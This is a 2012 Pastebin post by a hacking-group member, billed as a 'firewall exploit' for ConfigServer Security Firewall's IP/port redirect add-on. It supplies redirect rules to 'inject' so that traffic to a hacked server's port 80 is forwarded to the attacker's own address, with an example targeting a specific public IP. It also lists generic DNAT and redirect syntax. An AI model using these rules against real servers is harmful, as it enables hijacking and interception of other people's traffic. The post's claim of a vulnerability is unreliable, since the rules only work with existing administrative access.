Advertisement
Hex00010

MCSA CSF IP:Port - Redirect - Firewall Exploit- Hex00010

Jun 20th, 2012
405
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.09 KB | None | 0 0
  1. Re - Linking all of my old ' guest ' pastebins to one main account so i dont have to search for all of them through google
  2.  
  3.  
  4. Main PasteBin Link -> http://pastebin.com/u5yDYAWr
  5. -------------------------------------------------------------------------------------------------------
  6.  
  7. /*
  8. *
  9. *
  10. * Hex00010 - TeaMp0sion - For Life Bitches
  11. *
  12. *
  13. * Vuln:-> Config Server Security Firewall's New Addon - aka Port/IP Address Redirection ( BETA )
  14. *
  15. * Effects: Can Cause a Back Connect Exploit on Various IP Address redirecting all Traffic from the Main Server to your attacked Target
  16. *
  17. *
  18. * Found: 09:15:11
  19. *
  20. *
  21. */
  22.  
  23.  
  24.  
  25.  
  26.  
  27. ------------------------------------------------------------------------------------------------
  28.  
  29. [Code to inject into CSF Redirect IP]
  30.  
  31.  
  32.  
  33. #MCSA CSF IP : Port Redirect
  34. #
  35. #By Hex00010
  36. #
  37. # Key -
  38. # IpX = Server's IP address / IPy = Your Address portA = Hacked Server's Port to redirect / portB = Your Local Port to accept all incoming connections/ tcp/udp = Common Sense
  39. #
  40. #
  41. #First We need to Setup the Command We will forward all Connections on Hacked Servers Port on port 80 to our local Webserver Port = default 80 or whatever u have it as
  42. IPx|portA|IPy|portB|tcp
  43. #Example - Delete this line before executing this macro
  44.  
  45. 74.125.73.103|80|Your-Ip-Address|80|tcp
  46.  
  47. #
  48. # You can pretty much figure out where to go from there below is a Basic Command line structure - Your Imagination is not impossible
  49. #
  50. #
  51. #
  52. #
  53. #
  54. # IPx|*|IPy|*|tcp/udp - To IPx redirects to IPy
  55. # IPx|portA|IPy|portB|tcp/udp - To IPx to portA redirects to IPy portB
  56. #
  57. # DNAT examples:
  58. # 192.168.254.62|*|10.0.0.1|*|tcp
  59. # 192.168.254.62|666|10.0.0.1|25|tcp
  60. #
  61. # REDIRECT (redirect from port to a different one):
  62. # IPx|portA|*|portB|tcp/udp - To IPx to portA redirects to portB
  63. # *|portA|*|portB|tcp/udp - To portA redirects to portB
  64. #
  65. # REDIRECT examples:
  66. # 192.168.254.60|666|*|25|tcp
  67. # *|666|*|25|tcp
  68.  
  69.  
  70. [End Of Code to inject into the CSF Addon]
  71.  
  72. ---------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement